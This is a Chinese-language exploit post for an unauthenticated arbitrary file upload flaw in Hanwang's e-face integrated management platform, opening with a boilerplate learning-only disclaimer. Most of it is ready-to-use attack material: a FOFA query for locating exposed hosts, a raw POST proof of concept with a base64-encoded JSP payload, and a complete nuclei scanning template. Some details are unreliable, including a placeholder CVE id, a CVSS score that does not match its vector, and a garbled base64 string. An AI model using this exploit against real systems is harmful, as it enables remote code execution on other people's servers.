免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
漏洞描述:
汉王e脸通综合管理平台/updateVisitorMapConfig.do 接口存在任意文件上传漏洞。攻击者可在无需认证的情况下,通过向该接口上传恶意文件,实现任意文件上传,进而可能导致远程代码执行或服务器被控制
影响版本:
汉王e脸通综合管理平台
FOFA:
title="汉王智慧园区" && body="<link rel=\"icon\" href=\"/logo.png\""POC:
POST /manage/visitorMapConfig/updateVisitorMapConfig.do?recoToken=
HOST:
Content-Type: application/json
{"id":1,"mapName":"{{randstr}}","fileType":"txt","updatedPhoto":"PCUgb3V0LnByaW50bG4oInBib31qb,5yZmlwbXBsc3VrZGVjenVkc2VmeG15d2UiKTsgbmV3IGphdmEuaW8uRmlsZShhcHBsaWNhdGlvbi5nZXRSZWFsUGF0aChyZXF1ZXN0LmdldFN1cnZsZXBQYXRoKCkpKS5kZWxldGUoKTsgJT4"}nuclei模板
id: CVE-2025-ZZZZZ
info:
name: Hanwang EFaceGo Arbitrary File Upload
author: ProjectDiscoveryAI
severity: high
description: |
Hanwang EFaceGo contains an arbitrary file upload vulnerability in the /manage/visitorMapConfig/updateVisitorMapConfig.do endpoint
that allows unauthenticated attackers to upload malicious files and potentially execute server-side code.
reference:
- https://www.hanwang.com.cn/security
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-ZZZZZ
- https://cwe.mitre.org/data/definitions/434.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cwe-id: CWE-434
metadata:
verified: true
max-request: 1
vendor: hanwang
product: efacego
fofa-query: app="Hanwang-EFaceGo"
tags: cve,cve2025,hanwang,efacego,file-upload,rce,unrestricted
variables:
filename: "{{randstr}}.txt"
content: "{{randstr}}"
boundary: "{{randstr}}"
http:
- method: POST
path:
- "{{BaseURL}}/manage/visitorMapConfig/updateVisitorMapConfig.do?recoToken={{randstr}}"
headers:
Content-Type: application/json
body: |
{
"id":1,
"mapName":"{{randstr}}",
"fileType":"txt",
"updatedPhoto":"{{base64(content)}}"
}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "success"
- "file uploaded"
condition: or
extractors:
- type: regex
part: body
group: 1
regex:
- "\"message\":\"([^\"]+)\""
没有回复内容